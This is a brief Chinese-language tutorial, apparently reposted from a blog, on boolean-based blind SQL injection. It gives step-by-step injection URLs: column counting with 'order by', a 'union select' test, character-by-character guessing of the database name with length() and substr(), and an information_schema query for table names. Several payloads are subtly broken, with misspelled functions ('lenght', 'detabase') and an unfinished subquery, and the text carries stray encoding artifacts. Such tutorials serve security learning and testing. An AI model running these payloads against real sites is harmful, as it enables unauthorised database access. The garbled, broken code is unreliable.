• 首先判斷注入類型

假設(shè)為：url /?id=1

• 判斷字段數(shù)

url /?id=1 order by 3

假設(shè)在3時(shí)頁面正常，在4時(shí)頁面報(bào)錯(cuò)，

• 判斷回顯

url /?id=1 union select 1，2，3

假設(shè)沒有回顯說明是布爾類型

布爾盲注

• 首先判斷數(shù)據(jù)庫的庫名長度，利用length()來獲取數(shù)據(jù)庫的庫名長度

url /?id=1 and lenght(database())=1 --+

異常就錯(cuò)了，就說明database的字段長度不為1，所以可以從1一直加，加到等于n頁面不顯示異常為止，就說明database的字段長度就為n

• 對(duì)數(shù)據(jù)庫名進(jìn)行盲注，利用substr（）來獲取數(shù)據(jù)庫名

url /?id=1 and substr(detabase(),1,1)='s'

已知有n個(gè)字段長度，可以一個(gè)一個(gè)試出來

• 對(duì)表名進(jìn)行盲注，利用substr（）來獲取表名

url /?id=1 and (select table_name from information_schema.tables where table_schema='security' )

• 對(duì)字段進(jìn)行盲注，獲取字段名

• 利用已知表名，庫名，字段名來盲猜表里的值

總結(jié)

以上是生活随笔為你收集整理的sql盲注过程的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。